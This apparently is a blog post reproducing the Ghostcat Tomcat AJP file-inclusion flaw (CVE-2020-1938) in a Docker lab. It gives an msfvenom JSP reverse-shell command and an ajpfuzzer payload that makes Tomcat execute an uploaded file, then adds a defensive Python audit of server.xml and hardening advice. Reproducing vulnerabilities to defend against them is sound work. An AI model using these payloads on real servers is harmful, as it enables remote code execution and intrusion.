CVE-2020-1938: Tomcat file inclusion RCE reproduction


Docker environment

docker search tomcat-8.5.32
docker pull duonghuuphuc/tomcat-8.5.32
docker run -d -p 8080:8080 -p 8009:8009 --name ghostcat duonghuuphuc/tomcat-8.5.32
docker port ghostcat

Generate a reverse shell with MSF and start a listener

  1. Generate the JSP shell as shell.txt
    msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.0.104 LPORT=999 -f raw > shell.txt
  2. Start the listener

Reproduction

  1. Upload shell.txt to the ROOT web application

  2. ajpfuzzer
    https://github.com/doyensec/ajpfuzzer

java -jar ajpfuzzer_v0.6.jar
connect 192.168.0.102 8009
forwardrequest 2 "HTTP/1.1" "/11.jsp" 192.168.0.102 192.168.0.102 porto 8009 false "Cookie:AAAA=BBBB","Accept-Encoding:identity" "javax.servlet.include.request_uri:11.jsp","javax.servlet.include.path_info:shell.txt","javax.servlet.include.servlet_path:/"

11.jsp can be replaced with any .jsp file that does not exist in the web application; only for a path that no other servlet matches does Tomcat dispatch the request to the DefaultServlet.

The shell should have executed, but for some reason a session never gets established.
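The reproduction above works only because the AJP connector on port 8009 accepts request attributes (the javax.servlet.include.* values) from any client that can reach it. As an added example, not part of the original post, the following Python script audits a Tomcat server.xml for exactly that condition: an AJP connector that is enabled, not bound to loopback, or running without a shared secret. The attribute names it reads (protocol, port, address, secretRequired, secret) are real Tomcat Connector attributes; the two server.xml documents embedded in it are constructed samples, one shaped like the pre-8.5.51 default (AJP enabled, unbound, no secret) and one hardened.

```python
# Added example (not from the original post): audit a Tomcat server.xml for an
# AJP connector reachable by arbitrary clients, the condition CVE-2020-1938
# (Ghostcat) depends on. Connector attribute names are real Tomcat attributes;
# the sample documents below are constructed.
import xml.etree.ElementTree as ET

# Addresses that mean "every interface" when set on a Connector.
WILDCARD_ADDRESSES = {"0.0.0.0", "::", "*"}
LOOPBACK_ADDRESSES = {"127.0.0.1", "::1", "localhost"}


def audit_ajp_connectors(server_xml: str) -> list:
    """Return one finding string per weakness found on each AJP connector."""
    root = ET.fromstring(server_xml)
    findings = []
    for conn in root.iter("Connector"):
        protocol = conn.get("protocol", "HTTP/1.1")
        # Matches "AJP/1.3" as well as explicit handler classes such as
        # org.apache.coyote.ajp.AjpNioProtocol.
        if "ajp" not in protocol.lower():
            continue
        where = f"AJP connector on port {conn.get('port', '?')}"

        address = conn.get("address")
        if address is None or address in WILDCARD_ADDRESSES:
            findings.append(
                f"{where}: listens on all interfaces; bind it with "
                'address="127.0.0.1" or remove the connector if no reverse proxy uses it')
        elif address not in LOOPBACK_ADDRESSES:
            findings.append(
                f"{where}: bound to {address}; make sure only the reverse proxy can reach it")

        secret_required = (conn.get("secretRequired") or "").lower()
        if secret_required == "false":
            findings.append(
                f'{where}: secretRequired="false" accepts AJP requests from any client')
        elif not conn.get("secret"):
            findings.append(
                f"{where}: no shared secret configured (secretRequired defaults to true "
                "only on Tomcat 9.0.31, 8.5.51, 7.0.100 and later; older versions do "
                "not implement it)")
    return findings


def is_hardened(server_xml: str) -> bool:
    """True when no AJP connector in server_xml produces a finding."""
    return not audit_ajp_connectors(server_xml)


# Constructed sample: the shape of a pre-8.5.51 default server.xml, where the
# AJP connector is enabled, unbound and has no secret.
WEAK_SERVER_XML = """<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" connectionTimeout="20000" redirectPort="8443"/>
    <Connector port="8009" protocol="AJP/1.3" redirectPort="8443"/>
  </Service>
</Server>
"""

# Constructed sample: same connector, bound to loopback with a required secret.
HARDENED_SERVER_XML = """<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" connectionTimeout="20000" redirectPort="8443"/>
    <Connector port="8009" protocol="AJP/1.3" address="127.0.0.1"
               secretRequired="true" secret="REPLACE-WITH-A-RANDOM-SECRET" redirectPort="8443"/>
  </Service>
</Server>
"""

if __name__ == "__main__":
    for label, xml_text in (("weak", WEAK_SERVER_XML), ("hardened", HARDENED_SERVER_XML)):
        print(f"{label}: {'OK' if is_hardened(xml_text) else 'needs attention'}")
        for finding in audit_ajp_connectors(xml_text):
            print("  -", finding)
```

Run it against a real $CATALINA_HOME/conf/server.xml by reading the file into a string. Removing the connector entirely is the simplest fix when nothing in front of Tomcat speaks AJP; if a reverse proxy does, bind to loopback or the proxy's interface and set a secret that the proxy is configured with as well.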

References

https://mp.weixin.qq.com/s?__biz=MzUyNDk0MDQ3OQ==&mid=2247485009&idx=1&sn=5f619c27ec994949f5fa69d41d2dee05&chksm=fa24e381cd536a972db2cc5a5fc09be33a7833f1caa6440bb5979d3d7ea052384645fbd2b62c&mpshare=1&scene=23&srcid=&sharer_sharetime=1584439554350&sharer_shareid=1f92b9e8670fffeb7eea157894e3536a#rd

Posted 2020-03-18 15:27 by 雨九九, 2057 views, 0 comments